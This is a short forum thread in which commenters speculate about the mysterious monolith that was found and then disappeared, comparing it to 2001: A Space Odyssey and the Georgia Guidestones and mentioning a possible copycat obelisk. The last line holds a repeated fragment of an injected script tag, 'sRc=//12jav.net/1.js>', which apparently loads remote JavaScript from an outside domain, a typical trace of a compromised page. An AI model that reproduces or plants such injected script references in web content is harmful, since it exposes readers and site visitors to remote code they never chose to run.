I saw this on Reddit! Honestly, my first thought was the intro to2001: A Space Odyssey.

My second thought would probably be along the lines of the Georgia Guidestones, but moreas an art installation. Like a random placement meant to question it's origin or creator?I would love to know the original purpose, though!

I've seen the video and read some articles. Do not know what to think of it but with the way things are now it seems pretty suspicious. What gives?

So now it is gone, mysteriously disappeared. Any other information of thougts?

From what I understand the monolith had been there for at least a couple of years, but took a while to get discovered. And the disappearance was either it being stolen or removed by parks personnel. It was cut at the surface of the ground, leaving behind a chunk that goes down about five feet.

A second obelisk appeared in another area of the world not long before this one was stolen also. But it seems to have been put up by a different person. ... maybe a copycat. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
